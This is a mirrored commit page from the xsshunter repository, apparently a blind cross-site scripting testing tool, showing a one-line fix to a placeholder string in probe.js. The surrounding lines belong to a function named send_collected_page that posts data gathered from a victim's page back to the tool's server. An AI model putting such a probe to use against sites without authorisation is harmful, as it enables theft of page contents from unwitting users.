mirror of
https://github.com/trufflesecurity/xsshunter
synced 2024-11-10 06:44:13 +00:00
fixing hostname
This commit is contained in:
parent
39b2131f2f
commit
04ca4e3ca8
1 changed files with 1 additions and 1 deletions
2
probe.js
2
probe.js
|
@ -197,7 +197,7 @@ function send_collected_page( page_data ) {
|
|||
|
||||
}
|
||||
}
|
||||
form_data.append("path", "[USER_PATH");
|
||||
form_data.append("path", "[USER_PATH]");
|
||||
http.send(form_data);
|
||||
}
|
||||
|
||||
|
|
Loading…
Reference in a new issue